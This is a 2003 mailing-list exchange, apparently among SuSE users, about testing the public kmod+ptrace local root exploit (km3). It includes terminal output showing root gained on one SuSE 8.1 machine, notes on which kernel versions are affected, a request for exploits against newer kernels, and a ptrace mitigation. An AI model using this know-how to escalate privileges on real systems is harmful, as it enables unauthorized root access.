Hi again! Hmm on one SuSE8.1 machine it didn't work before and now after "testing" another modified version of the k3m.c k3m itself also works... david@imladris:~> ./km3 Linux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl> => Simple mode, executing /usr/bin/id > /dev/tty sizeof(shellcode)=95 => Child process started.......... => Child process started.....+ 9432 - 9432 ok! david@imladris:~> uid=0(root) gid=0(root) groups=100(users),6(disk),500(mldonkey) On another SuSE8.1 machine k3m running the first (and second time) produces this output: david@minasmorgul:~> ./km3 Linux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl> => Simple mode, executing /usr/bin/id > /dev/tty sizeof(shellcode)=95 => Child process started.......... => Child process started.......... => Child process started.......... => Child process started.......... => Child process started.......... => Child process started.......... => Child process started.......... => Child process started.......... => Child process started.......... => Child process started.......... => Child process started.......... => Child process started.......... => Child process started.. david@minasmorgul:~> ./km3 Linux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl> => Simple mode, executing /usr/bin/id > /dev/tty sizeof(shellcode)=95 => Child process started.......... => Child process started.......... => Child process started.... Both times I interrupted the program after a while via Ctrl-C. On both machines km3 is not suid and k_deflt-2.4.19-174 is installed. On Mittwoch, 26. März 2003 22:21, Eduard Avetisyan wrote:
Hi ;-)
--- David Huecking <d.huecking@gmx.net> wrote:
For me it only works for SuSE Kernel 2.4.16-4GB delivered for SuSE 7.3. 2.4.18-4GB of 8.0 and 2.4.19-4GB of 8.1 seem to be "safe" against THIS particular exploit. (All the "old" unpatched versions...) Does anybody have an exploit for these kernels?
I've seen it (the km3.c) work on at least two machines with 8.1, probably the k_deflt kernel...
But when changing the syscall ptrace() to a version that only works for euid 0 none of the exploits above work... ;-) -- Eat, sleep and go running, David Huecking. Encrypted eMail welcome! GnuPG/ PGP-Key: 0x57809216. Fingerprint: 3DF2 CBE0 DFAA 4164 02C2 4E2A E005 8DF7 5780 9216